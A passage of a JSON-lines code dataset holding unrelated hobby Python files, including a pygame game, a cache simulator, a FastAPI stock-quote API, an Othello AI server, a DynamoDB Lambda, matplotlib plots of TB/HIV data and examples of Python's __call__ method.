and\n self.position[1] < mousePosition[1] + 1 and\n self.position[1] + self.size[1] > mousePosition[1]\n )\n\n def getBackground(self):\n if not self.background[1]:\n return self.background[0]\n return self.background[int(self.handleHover())]\n\n def getColor(self):\n if not self.color[1]:\n return self.color[0]\n return self.color[int(self.handleHover())]\n\n def onRender(self, screen):\n fontRender = self.renderFont()\n if self.background[0]:\n pygame.draw.rect(screen, self.getBackground(), (self.position + self.size))\n screen.blit(fontRender, (self.getTextPosition(fontRender) + 
self.size))","repo_name":"dominikdrozd/Space-Invaders-Python","sub_path":"Src/Gui/Label.py","file_name":"Label.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38131335009","text":"def fib(n):\n    a, b = 0, 1\n    count = 0\n    while count < n:\n        count += 1\n        yield a\n        a, b = b, a + b\n\nx = [x**3 for x in fib(5)]\nprint(x)\n","repo_name":"chyld/pythonista","sub_path":"factorial-map.py","file_name":"factorial-map.py","file_ext":"py","file_size_in_byte":159,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22935430861","text":"\"\"\"\nName: Cache memory functions.\nAuthors: Luis Alberto Salazar and Guido Ernesto Salazar.\nDate: April/May 2021.\n\"\"\"\n\n# Total ways = 2\n# Blocks per set = 32/2 = #16 sets\n# Total blocks = 32\n# Offset = 3\n# Index = 4\n# Tag = 4/9\n\n# Cache\n\nfrom Funciones_RAM import modificar_ram, traer_datos_ram\nimport random\n\nhits = 0\ntotales = 0\ncache = [\n    # First way\n    {0: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n    1: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n    2: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n    3: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n    4: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n    5: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n    6: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n    7: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n    8: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n    9: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n    10: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n    11: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n    12: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n    13: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n    14: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n    15: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0}},\n    # Second way\n    {0: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n    1: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n    2: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n    3: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n    4: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n    5: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n    6: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n    7: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n    8: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n    9: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n    10: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n    11: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n    12: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n    13: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n    14: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0},\n    15: {\"validez\": 0, \"tag\": \"0x000\", \"data\": [], \"bit_sucio\": 0}}\n]\n
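\n# Address layout sanity check (a minimal sketch mirroring the transformacion() helper below; the sample address is hypothetical): for a 16-bit address, tag = addr >> 7 (9 bits), index = (addr >> 3) & 0xF (4 bits, selects 1 of 16 sets), offset = addr & 0x7 (3 bits).\n#\n# addr = 0b000010101_1010_110  # tag=0b000010101, index=0b1010, offset=0b110\n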
\n# Helper functions\n\ndef llamarMiss():\n    \"\"\"\n    Computes the miss ratio over the whole run of the system.\n    Inputs: \n        none.\n    Outputs: \n        the miss ratio.\n    \"\"\"\n    global totales, hits\n    try:\n        total = hits / totales\n    except ZeroDivisionError:\n        total = 0\n    hratio = 1 - total\n    return hratio\n\ndef transformacion(numero):\n    \"\"\"\n    Converts the integer to its 16-bit binary representation and splits out\n    the lookup fields that identify its position in the cache.\n    Inputs:\n        numero is a decimal number representing a memory position.\n    Outputs:\n        index: the position of the set\n        tag: the identifier of the memory block brought into the cache\n        offset: the position in the data list to be modified.\n    \"\"\"\n    numero = bin(numero)[2:].zfill(16)\n    index = int(numero[16-7:16-3], 2) \n    tag = \"0x\" + hex(int(numero[:16-7], 2))[2:].zfill(3)\n    offset = int(numero[16-3:], 2)\n    return (index, tag, offset)\n\ndef verificarMiss(numero):\n    \"\"\"\n    Checks whether the lookup in the indicated set is a miss or a hit.\n    Inputs: \n        an integer.\n    Outputs: \n        a tuple with the truth value of the check, the cache way, the set\n        index, the set tag and, last, the offset bits.\n    \"\"\"\n    global cache, hits, totales\n    totales += 1\n    index, tag, offset = transformacion(numero)\n    ver, pos = False, 0\n    if cache[0][index][\"validez\"] == 0: pos = 0\n    elif cache[0][index][\"validez\"] == 1 and cache[0][index][\"tag\"] == tag: ver, pos = True, 0\n    elif cache[1][index][\"validez\"] == 0: pos = 1\n    elif cache[1][index][\"validez\"] == 1 and cache[1][index][\"tag\"] == tag: ver, pos = True, 1\n    else: pos = random.randrange(1000) % 2\n    if ver: hits += 1\n    return (ver, pos, index, tag, offset)\n\ndef traer_cache(pos, index, tag):\n    \"\"\"\n    Replaces the cache line at the indicated position.\n    Inputs:\n        the memory way, the cache index and the block tag.\n    Outputs:\n        none.\n    \"\"\"\n    global cache\n    if cache[pos][index][\"bit_sucio\"] == 1: modificar_ram(index, cache[pos][index][\"tag\"], cache[pos][index][\"data\"])\n    cache[pos][index][\"bit_sucio\"] = 0\n    cache[pos][index][\"validez\"] = 1\n    cache[pos][index][\"tag\"] = tag\n    cache[pos][index][\"data\"] = traer_datos_ram(index, tag)\n\n# Interface\n\ndef escribir_cache(numero, dato):\n    \"\"\"\n    Procedure that writes to the cache.\n    Inputs:\n        numero: the memory position to write to\n        dato: the information to store in memory.\n    Outputs:\n        none.\n    \"\"\"\n    global cache\n    pos, index, offset = general(numero)\n    cache[pos][index][\"data\"][offset] = dato\n    cache[pos][index][\"bit_sucio\"] = 1\n    ver_cache(\"write data={} at position={}\".format(dato, numero))\n\ndef leer_cache(numero):\n    \"\"\"\n    Procedure that reads a value from the cache.\n    Inputs:\n        numero: the memory position to read.\n    Outputs:\n        the value held in the cache.\n    \"\"\"\n    global cache\n    pos, index, offset = general(numero)\n    ver_cache(\"read position={}\".format(numero))\n    return cache[pos][index][\"data\"][offset]\n
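\n# Quick usage sketch of the interface above (hypothetical address; assumes the Funciones_RAM module is importable so misses can be filled from main memory):\n#\n# escribir_cache(1234, 'A')   # write-allocate: fetch the block, patch the offset, set the dirty bit\n# print(leer_cache(1234))     # now a hit in the same block -> 'A'\n# print(llamarMiss())         # miss ratio so far\n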
\ndef general(numero):\n    \"\"\"\n    Performs the operations shared by reads and writes.\n    Inputs:\n        numero: the memory position to work with.\n    Outputs:\n        pos: the way where the data lives.\n        index: the set where the data lives.\n        offset: the position of the data within the block.\n    \"\"\"\n    global cache\n    ver, pos, index, tag, offset = verificarMiss(numero)\n    if not ver: traer_cache(pos, index, tag)\n    return pos, index, offset\n\ndef ver_cache(instruccion):\n    \"\"\"\n    Procedure that logs the cache changes per instruction.\n    Inputs:\n        instruccion: a string describing what was executed.\n    Outputs:\n        Cache.txt: a text file that shows the changes over time.\n    \"\"\"\n    global cache\n    f = open(\"Cache.txt\", \"a\")\n    f.write(\"----------------------------------------------------------------------------------------------------\\n\")\n    f.write(\"On query number {} the instruction {} was executed and the cache is:\\n\".format(totales, instruccion))\n    i = 1\n    for via in cache:\n        f.write(\"These are the contents of way {}\\n\".format(i))\n        for posicion in via:\n            f.write(str(posicion) + \" \" + str(via[posicion]) + \"\\n\")\n        i += 1\n    f.close()","repo_name":"GAOV13/Arquitectura-del-Computador","sub_path":"Memoria cache/Funciones_Cache.py","file_name":"Funciones_Cache.py","file_ext":"py","file_size_in_byte":7414,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38523962067","text":"from typing import Union\n\nfrom fastapi import FastAPI, HTTPException\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom bsedata.bse import BSE\n\nfrom datetime import datetime\n\napp = FastAPI()\norigins = [\"*\"]\napp.add_middleware(\n    CORSMiddleware,\n    allow_origins=origins,\n    allow_credentials=True,\n    allow_methods=[\"*\"], \n    allow_headers=[\"*\"],\n)\n\nbse = BSE(update_codes = True)\n\n\ndef getRightFormat(time_series):\n    \"\"\"\n    Highcharts.js requires the timeseries data to be in a certain format: an N x 2 array\n    where each row holds a timestamp in milliseconds and the respective value.\n\n    time_series = [{'date': 'Fri Dec 30 2022 00:00:00', 'value': 6574.16, 'vol': 20394}]\n    \"\"\"\n    data = []\n    for s in time_series:\n        time = s['date']\n        time_obj = datetime.strptime(time, \"%a %b %d %Y %H:%M:%S\")\n        timestamp = int(time_obj.timestamp()) * 1000\n        data.append([timestamp, s['value']])\n    return data\n
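\n# Quick check of the conversion above (a minimal sketch; the sample row is hypothetical and the exact epoch value depends on the server's local timezone):\n#\n# getRightFormat([{'date': 'Fri Dec 30 2022 00:00:00', 'value': 6574.16, 'vol': 20394}])\n# # -> [[1672358400000, 6574.16]] for a UTC clock\n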
\n@app.get(\"/\")\ndef read_root():\n    return {\"Hello\": \"World\"}\n\n@app.get(\"/bse/{id}\")\nasync def read_stock(id: int):\n    q = str(id)\n    if bse.verifyScripCode(q):\n        quote = bse.getQuote(q)\n        return quote\n    else:\n        raise HTTPException(status_code=404, detail=\"Please check your BSE scrip code\")\n    \n    \n@app.get(\"/bse/{id}/time/{period}\")\nasync def read_stock_price_history(id: int, period: str):\n    q = str(id)\n    p = str(period)\n    if p not in ['1M', '3M', '6M', '12M']:\n        raise HTTPException(status_code=404, detail=\"The permitted time periods are 1M, 3M, 6M & 12M\")\n    if not bse.verifyScripCode(q):\n        raise HTTPException(status_code=404, detail=\"Please check your BSE scrip code\")\n    \n    price_history = bse.getPeriodTrend(q, p)\n    price_history_milliseconds_format = getRightFormat(price_history)\n    return price_history_milliseconds_format\n    \n\n@app.get(\"/bse/list/{performers}\")\nasync def read_bse_performers(performers: str):\n    if performers == \"topGainers\":\n        return bse.topGainers()\n    elif performers == \"topLosers\":\n        return bse.topLosers()\n    else:\n        raise HTTPException(status_code=404, detail=\"Oops, try topGainers or topLosers\")\n    \n    \n\n\n# @app.get(\"/items/{item_id}\")\n# def read_item(item_id: int, q: Union[str, None] = None):\n#     return {\"item_id\": item_id, \"q\": q}","repo_name":"karthik5699/langchainXFastAPI","sub_path":"fastapi1.py","file_name":"fastapi1.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16496291780","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nn = int(input())\r\ncommands = [input().strip() for _ in range(n)]\r\nstack = []\r\n\r\nfor command in commands:\r\n    command = command.split()\r\n    if command[0] == 'push':\r\n        stack.append(command[1])\r\n    elif command[0] == 'pop':\r\n        print(-1) if not stack else print(stack.pop())\r\n    elif command[0] == 'size':\r\n        print(len(stack))\r\n    elif command[0] == 'empty':\r\n        print(0) if stack else print(1)\r\n    elif command[0] == 'top':\r\n        print(stack[-1]) if stack else print(-1)","repo_name":"vbellv/Algorithm","sub_path":"백준/Silver/10828. 
스택/스택.py","file_name":"스택.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32024566946","text":"from http.server import BaseHTTPRequestHandler,HTTPServer, SimpleHTTPRequestHandler\nimport json\nimport copy\nfrom random import randint\n\n#find the lists from each directions.\ndef getVectors(state, r, c):\n vectors = []\n #left\n left = state[r][:c]\n #reverse order\n left = left[::-1]\n l = []\n for item in left:\n if item != ' ':\n l.append(item)\n else:\n break\n #print(l)\n vectors.append(l)\n\n #LU\n lu = []\n i = r - 1\n j = c - 1\n while i >= 0 and j >= 0:\n if state[i][j] != ' ':\n lu.append(state[i][j])\n else:\n break\n i -= 1\n j -= 1\n #print(lu)\n vectors.append(lu)\n\n col = []\n for row in state:\n col.append(row[c])\n\n #up\n up = col[: r]\n #reverse order\n up = up[::-1]\n u = []\n for item in up:\n if item != ' ':\n u.append(item)\n else:\n break\n #print(u)\n vectors.append(u)\n\n #RU\n ru = []\n i = r - 1\n j = c + 1\n while i >= 0 and j < len(state):\n if state[i][j] != ' ':\n ru.append(state[i][j])\n else:\n break\n i -= 1\n j += 1\n #print(ru)\n vectors.append(ru)\n\n #right\n right = state[r][c + 1:]\n r_l = []\n for item in right:\n if item != ' ':\n r_l.append(item)\n else:\n break\n #print(r_l)\n vectors.append(r_l)\n\n #RD\n rd = []\n i = r + 1\n j = c + 1\n while i < len(state) and j < len(state):\n if state[i][j] != ' ':\n rd.append(state[i][j])\n else:\n break\n i += 1\n j += 1\n #print(rd)\n vectors.append(rd)\n\n #down\n down = col[r + 1:]\n d = []\n for item in down:\n if item != ' ':\n d.append(item)\n else:\n break\n #print(d)\n vectors.append(d)\n\n #LD\n ld = []\n i = r + 1\n j = c - 1\n while i < len(state) and j >= 0:\n if state[i][j] != ' ':\n ld.append(state[i][j])\n else:\n break\n i += 1\n j -= 1\n #print(ld)\n vectors.append(ld)\n return vectors\n\ndef getActionsByIndex(state, r, c, find, opposite):\n actions = []\n vectors = getVectors(state, r, c)\n\n #print(find)\n #print(vectors)\n for i, item in enumerate(vectors):\n if len(item) > 0:\n if opposite not in item:\n #these are valid actions\n if i == 0:\n #left\n new_c = c - len(item) - 1\n if new_c >= 0:\n actions.append([r, new_c])\n if i == 1:\n #left-up\n new_r = r - len(item) - 1\n new_c = c - len(item) - 1\n if new_r >= 0 and new_c >= 0:\n actions.append([new_r, new_c])\n if i == 2:\n #up\n new_r = r - len(item) - 1\n if new_r >= 0:\n actions.append([new_r, c])\n if i == 3:\n #right-up\n new_r = r - len(item) - 1\n new_c = c + len(item) + 1\n if new_r >= 0 and new_c < len(state):\n actions.append([new_r, new_c])\n if i == 4:\n #right\n new_c = c + len(item) + 1\n if new_c < len(state):\n actions.append([r, new_c])\n if i == 5:\n #right-down\n new_r = r + len(item) + 1\n new_c = c + len(item) + 1\n if new_r < len(state) and new_c < len(state):\n actions.append([new_r, new_c])\n if i == 6:\n #down\n new_r = r + len(item) + 1\n if new_r < len(state):\n actions.append([new_r, c])\n if i == 7:\n #left-down\n new_r = r + len(item) + 1\n new_c = c - len(item) - 1\n if new_r < len(state) and new_c >= 0:\n actions.append([new_r, new_c])\n\n return actions\n\ndef getActions(state, find):\n actions = []\n indexFind = 'X'\n if find == 'X':\n indexFind = 'O'\n for r, row in enumerate(state):\n for c, item in enumerate(row):\n if item == find:\n for item in getActionsByIndex(state, r, c, indexFind, find):\n if item not in actions:\n actions.append(item)\n return actions\n\ndef setState(state, r, c, 
color):\n vectors = getVectors(state, r, c)\n new_state = copy.deepcopy(state)\n #print(vectors)\n for i, item in enumerate(vectors):\n if len(item) > 0:\n if color in item:\n #find the count of non color in the list.\n count = getCountList(item, color)\n if count > 0:\n if i == 0:\n #left\n for j in range(count):\n new_state[r][c - (j + 1)] = color\n if i == 1:\n #left-up\n for j in range(count):\n new_state[r - (j + 1)][c - (j + 1)] = color\n if i == 2:\n #up\n for j in range(count):\n new_state[r - (j + 1)][c] = color\n if i == 3:\n #right-up\n for j in range(count):\n new_state[r - (j + 1)][c + (j + 1)] = color\n if i == 4:\n #right\n for j in range(count):\n new_state[r][c + (j + 1)] = color\n if i == 5:\n #right-down\n for j in range(count):\n new_state[r + (j + 1)][c + (j + 1)] = color\n if i == 6:\n #down\n for j in range(count):\n new_state[r + (j + 1)][c] = color\n if i == 7:\n #left-down\n for j in range(count):\n new_state[r + (j + 1)][c - (j + 1)] = color\n #print(count)\n #print(item)\n new_state[r][c] = color\n return new_state\n\ndef getCountList(l, color):\n count = 0\n for item in l:\n if item != color:\n count += 1\n else:\n break\n return count\n\ndef getColorCount(state, color):\n count = 0\n for r in state:\n for c in r:\n if c == color:\n count += 1\n return count\n\ndef getActionOutcomes(actions, state, color) :\n new_states = []\n for action in actions:\n item = {}\n item[\"action\"] = action\n item[\"state\"] = setState(state, action[0], action[1], color)\n item[\"count\"] = getColorCount(item[\"state\"], color)\n new_states.append(item)\n return new_states\n\ndef getMaxActions(game_state, color):\n rtnActions = []\n\n actions = getActions(game_state, color)\n\n states = getActionOutcomes(actions, game_state, color)\n\n states.sort(key=lambda x: x[\"count\"], reverse=True)\n\n #max val\n if len(states) > 0:\n max_val = states[0]['count']\n #rtnActions = list(filter(lambda x: x['count'] == max_val, states))\n\n for item in states:\n if item['count'] == max_val:\n rtnActions.append(item)\n\n return rtnActions\n\ndef rateOption(game_state, action):\n rating = 0\n r = action[0]\n c = action[1]\n n = len(game_state)\n #make edge pieces worth + 7\n if r == 0 or r == n - 1:\n rating += 25\n #make corners worth the most\n if c == 0 or c == n - 1:\n rating += 40\n if c == 0 or c == n - 1:\n rating += 25\n\n if r > 0:\n if c > 0:\n if game_state[r - 1][c - 1] == ' ':\n rating += 5\n if game_state[r - 1][c] == ' ':\n rating += 1\n if c < n - 1:\n if game_state[r - 1][c + 1] == ' ':\n rating += 5\n if c > 0:\n if game_state[r][c - 1] == ' ':\n rating += 1\n if c < n - 1:\n if game_state[r][c + 1] == ' ':\n rating += 1\n if r < n - 1:\n if c > 0:\n if game_state[r + 1][c - 1] == ' ':\n rating += 5\n if game_state[r + 1][c] == ' ':\n rating += 1\n if c < n - 1:\n if game_state[r + 1][c + 1] == ' ':\n rating += 5\n\n #minus points for leeting oponent get to outside.\n if r == 1 or r == n - 2:\n if c > 0 and c < n - 1:\n rating -= 12\n if c == 1 or c == n - 1:\n rating -= 30\n if c == 1 or c == n - 2:\n if r > 0 and r < n - 1:\n rating -= 12\n\n return rating\n\ndef getBestOption(game_state, find):\n #get all possibles.\n opositeFind = 'X'\n if find == 'X':\n opositeFind = 'O'\n\n actions = getActions(game_state, find)\n states = getActionOutcomes(actions, game_state, find)\n\n options = []\n min_count = -1\n\n for option in states:\n r = option['action'][0]\n c = option['action'][1]\n\n #check for corners.\n if r == 0:\n if c == 0 or c == len(game_state) - 1:\n return option\n 
elif r == len(game_state) - 1:\n if c == 0 or c == len(game_state) - 1:\n return option\n\n max_actions = getMaxActions(option['state'], opositeFind)\n\n print(max_actions)\n\n if len(max_actions) == 0:\n #game ender or oponent cannot move.\n return option\n else:\n if min_count == -1 or min_count > max_actions[0]['count']:\n min_count = max_actions[0]['count']\n options = []\n options.append(option)\n elif min_count == max_actions[0]['count']:\n options.append(option)\n\n if len(options) > 1:\n #lets get greedy\n options.sort(key=lambda x: x['count'], reverse=True)\n max_flips = options[0]['count']\n options = list(filter(lambda x: x['count'] == max_flips, options))\n\n #lets get best by custom heuristic\n best_rated = []\n highest = -1\n for option in options:\n rating = rateOption(option['state'], option['action'])\n if highest == -1 or rating > highest:\n highest = rating\n best_rated = []\n best_rated.append(option)\n elif rating == highest:\n best_rated.append(option)\n\n #now if there is more than 1 random pick\n if len(best_rated) > 1:\n #random\n index = randint(0, len(best_rated) - 1)\n return best_rated[index]\n else:\n #must be at least 1.\n return best_rated[0]\n elif len(options) == 1:\n return options[0]\n else:\n return None\n\ndef getBestChoice(state, color):\n best = getBestOption(state, color)\n\n if best is not None:\n return best['action']\n else:\n return None\n\nclass GetHandler(SimpleHTTPRequestHandler):\n def do_GET(self):\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n return\n\n def do_POST(self):\n if self.path == '/api/v1/ai':\n content_len = int(self.headers.get('Content-Length'))\n post_body = self.rfile.read(content_len).decode(\"utf-8\")\n data = json.loads(post_body)\n\n #find the best option.\n choice = getBestChoice(data[\"state\"], data[\"status\"][\"player\"][\"color\"])\n print(choice)\n\n self.send_response(200)\n self.send_header('Content-type', 'application/json')\n self.end_headers()\n\n\n rtnData = {}\n rtnData[\"player\"] = data[\"status\"][\"player\"]\n rtnData[\"location\"] = choice\n post_data = json.dumps(rtnData)\n\n self.wfile.write(bytes(post_data, 'utf8'))\n return\n\nHandler=GetHandler\n\nhttpd=HTTPServer((\"0.0.0.0\", 9000), Handler)\nhttpd.serve_forever()\n","repo_name":"randysimpson/othello","sub_path":"othello-ai/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19919028951","text":"import json\nfrom boto3.dynamodb.conditions import Key, Attr\nimport boto3\nfrom json2html import *\nfrom datetime import date, datetime, time, timedelta\nimport os\n\nSECRET_ACCESS_KEY = os.environ['SKEY']\nACCESS_KEY_ID = os.environ['AKEY']\n\ndef lambda_handler(event, context):\n\n dynamodb = boto3.resource('dynamodb', \\\n aws_access_key_id=ACCESS_KEY_ID, \n aws_secret_access_key=SECRET_ACCESS_KEY, \n region_name='us-west-2')\n table = dynamodb.Table('baboons1')\n baboon = str(event[\"queryStringParameters\"]['indiv'])\n t0 = str(event[\"queryStringParameters\"]['t0'])\n t1 = str(event[\"queryStringParameters\"]['t1'])\n dfflag = event[\"queryStringParameters\"]['table'].lower() == \"true\"\n\n # two query types: query and scan; here are format notes: \n # response = table.query(KeyConditionExpression=Key('indiv').eq(baboon) & Key('time').between(d0, final_dt.strftime(\"%T\")))\n # response = table.scan(FilterExpression=Key('indiv').eq(baboon) & Key('x').between(d0, 
final_dt.strftime(\"%T\")))\n\n    response = table.query(KeyConditionExpression=Key('indiv').eq(baboon) & Key('time').between(t0, t1))\n\n    for item in response['Items']: item['row'] = float(item['row'])\n\n    if not dfflag:\n        print(\"Returning JSON\")\n        dict_string = json.dumps(response['Items'], indent=4)\n        return { \"statusCode\": 200, \"body\": dict_string }\n    else:\n        print(\"Returning HTML\")\n        return { \n            \"statusCode\": 200, \n            \"body\": json2html.convert(response['Items']), \n            \"headers\": {'Content-Type': 'text/html'}\n        }\n","repo_name":"robfatland/zero2x","sub_path":"Zero2API/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38731229222","text":"import sys\nimport pygame\nfrom character import Character\nfrom ball import Ball\nfrom random import randint\n\n\ndef run_game():\n    pygame.init()\n    screen = pygame.display.set_mode((1200, 800))\n    background = (0, 0, 200)\n    pygame.display.set_caption(\"Blue Skies\")\n    character = Character(screen)\n    ball = Ball(screen)\n    lives = 3\n\n    game_active = True\n    moving_right = False\n    moving_left = False\n\n    while True:\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:\n                sys.exit()\n            elif event.type == pygame.KEYDOWN:\n                if event.key == pygame.K_LEFT:\n                    moving_left = True\n                elif event.key == pygame.K_RIGHT:\n                    moving_right = True\n            elif event.type == pygame.KEYUP:\n                if event.key == pygame.K_LEFT:\n                    moving_left = False\n                elif event.key == pygame.K_RIGHT:\n                    moving_right = False\n\n        if game_active:\n            screen.fill(background)\n\n            if moving_left and character.rect.left > 0:\n                character.rect.x -= 2\n            if moving_right and character.rect.right < 1200:\n                character.rect.x += 2\n\n            ball.fall()\n            if ball.rect.top > 800:\n                ball.rect.top = 0\n                ball.rect.x = randint(50, 1100)\n                lives -= 1\n            elif ball.rect.colliderect(character.rect):\n                ball.rect.top = 0\n                ball.rect.x = randint(50, 1100)\n\n            ball.blitme()\n            character.blitme()\n            pygame.display.flip()\n            if lives == 0:\n                game_active = False\n\n        if game_active is False:\n            sys.exit()\n
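\n# The loop above uses the classic KEYDOWN/KEYUP flag pattern; an equivalent polling variant (a sketch, not part of the original game) reads the whole keyboard once per frame:\n#\n# keys = pygame.key.get_pressed()\n# moving_left, moving_right = keys[pygame.K_LEFT], keys[pygame.K_RIGHT]\n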
\nrun_game()\n","repo_name":"VictorStankov/Python_Crash_Course","sub_path":"Try it Yourself/Chapter 13/Catch/Catch.py","file_name":"Catch.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21470604912","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov  6 22:28:25 2022\r\n\r\n@author: nithi\r\n\"\"\"\r\n# To plot the graph\r\nimport matplotlib.pyplot as plt\r\n# Used to read the csv file\r\nimport pandas as pd\r\n# Create a variable and store the csv file data in it.\r\nread_data = pd.read_csv(r'D:\\\Applied Data Science 1\\\Assignment_1\\\All Countries.csv')\r\nprint(read_data)\r\n# .loc is used to access a specific country from the column\r\nselectedCountry=read_data.loc[read_data['Location'] == 'South Africa']\r\nselectedCountry2=read_data.loc[read_data['Location'] == 'Congo']\r\nselectedCountry3=read_data.loc[read_data['Location'] == 'Egypt']\r\nselectedCountry4=read_data.loc[read_data['Location'] == 'Indonesia']\r\n# Creating variables x, y, w, u to store each selected country's years and values\r\nx = selectedCountry['Period']\r\ny = selectedCountry['Value']\r\nw = selectedCountry2['Period']\r\nu = selectedCountry2['Value']\r\nplt.figure()\r\n# Line plot of the x and y data. The label arguments are used to produce the legend\r\nplt.plot(x,y,label='South Africa')\r\nplt.plot(w,u,label='Congo')\r\n# Used to label the x-axis and y-axis\r\nplt.xlabel('Year')\r\nplt.ylabel('Percentage (%)') \r\n# To name the title for the graph \r\nplt.title('TB Patients with HIV')\r\n# Add the legend; loc is used to place the legend on a specific side of the graph\r\nplt.legend(loc='lower right')\r\n# To remove the whitespace from the x-axis\r\nplt.margins(x=0)\r\n# To show the graph\r\nplt.show()\r\nplt.figure()\r\n# Pie plotting the selected country's years\r\n# autopct is used to specify the percentage for each slice of the pie\r\n# explode is used to separate a slice from the pie\r\nplt.pie(selectedCountry3['Value'],labels=selectedCountry3['Period'],\r\n        autopct= '%1.2f%%',explode=(0.2,0,0,0.2,0,0,0))\r\nplt.title(\"Egypt TB Patients with HIV\")\r\nplt.show()\r\nplt.figure()\r\n# Bar plotting the country's percentage on the y-axis and years on the x-axis\r\nplt.bar(selectedCountry4['Period'],selectedCountry4['Value'],label='Indonesia')\r\nplt.xlabel('Year')\r\nplt.ylabel('Percentage (%)') \r\nplt.title('TB Patients with HIV')\r\nplt.legend()\r\nplt.show()","repo_name":"Nithin-Chakaravarthi-Murugavel/Assignment1","sub_path":"Code.py","file_name":"Code.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1129255213","text":"#\n# 12\n#\n# Magic Method '__call__()'.\n# Functors and Decorator Classes\n\nimport math\n\n\nclass Counter:\n    def __init__(self):\n        self.__counter = 0\n\n    def __call__(self, step=1, *args, **kwargs):\n        print(f\"__call__ method was called. *args: {args}, **kwargs: {kwargs}\")\n        self.__counter += step\n        return self.__counter\n\n\nclass StripChars:\n    def __init__(self, chars):\n        self.__chars = chars\n\n    def __call__(self, *args, **kwargs):\n        print(f\"__call__ method was called. *args: {args}, **kwargs: {kwargs}\")\n        if not isinstance(args[0], str):\n            raise TypeError(\"the argument should be a string\")\n\n        return args[0].strip(self.__chars)\n\n\nclass Derivate:\n    def __init__(self, func):\n        self.__fn = func\n\n    def __call__(self, x, dx=0.0001, *args, **kwargs):\n        print(f\"__call__ method was called. *args: {args}, **kwargs: {kwargs}\")\n\n        return (self.__fn(x + dx) - self.__fn(x)) / dx\n\n\n@Derivate\ndef df_sin(x):\n    return math.sin(x)\n\n\ncounter = Counter()\nprint(counter.__dict__)\ncounter()\ncounter()\ncounter()\nprint(counter(3))\n# -----------------\ns1 = StripChars(\"?:!.; \")\nresult = s1(\" Hello World! 
